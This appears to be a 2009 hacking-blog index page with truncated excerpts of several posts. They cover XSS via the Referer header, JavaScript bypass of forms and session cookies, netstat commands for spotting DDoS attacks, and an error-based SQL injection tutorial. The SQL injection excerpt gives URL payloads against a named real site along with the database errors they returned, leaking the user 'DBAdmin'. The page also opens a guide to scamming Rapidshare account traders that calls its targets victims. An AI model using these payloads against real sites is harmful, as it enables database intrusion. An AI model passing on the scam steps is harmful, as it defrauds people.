Hacking papers, tutorials »

[9 Feb 2009 | No Comment | 35 views]

Another way to create XSS,
similar to XAS (exploiting the request header)

We will discuss that here.
http://www.cnil.fr/index.php?id=123
GET /index.php?id=123 HTTP/1.1
Host: www.cnil.fr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com/search?q=http%3A%2F%2Fwww.cnil.fr%2Findex.php%3Fid%3D123&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: fe_typo_user=621d0722b0; TestCookieAlone=ok
The Referer header is used by many webmasters to track visitors.
That is why solutions exist to keep the webmaster from knowing which site you came from.
example: http://anonym.to/en.html
We just …


SQL Injection, tutorials »

[6 Feb 2009 | No Comment | 66 views]

This tutorial is an overview of how JavaScript can be used to bypass simple/advanced HTML forms and how it can be used to override cookie/session authentication.
SIMPLE HTML FORMS
1. Bypassing Required Fields
Surely you have met a webpage that requires you to fill all fields in a form in order to submit it. It is possible to bypass these types of restrictions on any webpage. If you take a look at the webpage’s source and follow it down to the form’s code, you will notice the onsubmit form attribute. Hopefully by this …


tutorials »

[6 Feb 2009 | No Comment | 36 views]

Because a null-route to an ip is not a solution, it is a kludge.
1) It is based on real attacks.
2) There is no theory, only practice.
A--> Detecting the attack
1) Using the netstat command
netstat -an | grep :80 | sort
netstat -n -p | grep SYN_REC | awk '{print $5}' | awk -F: '{print $1}'
netstat -n -p|grep SYN_REC | wc -l
netstat -lpn|grep :80 |awk '{print $5}'|sort
netstat -an | grep :80 | awk '{ print $5 }' | awk -F: '{ print $1 }' | sort | uniq -c | sort …


SQL Injection »

[6 Feb 2009 | No Comment | 34 views]

Today, I will write a little tutorial for you:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/ListByCategory.asp, line 25
and 1=convert(int,system_user)-
http://amboi.com/ListByCategory.asp?CatID=111%20and%201=convert(int,system_user)-
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'DBAdmin' to a column of data type int.
/ListByCategory.asp, line 25
and 1=convert(int,(select top 1 table_name from information_schema.tables))-
http://amboi.com/ListByCategory.asp?CatID=111%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))-

Microsoft OLE DB Provider for ODBC Drivers error '80040e09'
[Microsoft][ODBC SQL Server Driver][SQL Server]SELECT permission denied on object 'sysobjects', database 'Auction', owner 'dbo'.
/ListByCategory.asp, line 25 …


tutorials »

[6 Feb 2009 | No Comment | 32 views]

Important:
When Creating MoneyBookers ID Remember the Birthday they require it when sending money
First Off search for a rapidshare buyer or seller
There search up Rapidshare accounts. You will find 100’s of guys selling and as well as buying. Pick your Victim
Golden Rapidshare Rules:
Quote:
1. If person selling accounts its always money first
2. If person Buying accounts its always Accounts first
1. They Buy converted accounts that is Converted 10ks 20ks
2. Add the dealer in ur Y!M or w/e client you use for chatting
3. Tell him as follows:
Hello I am selling Legal 1 month …
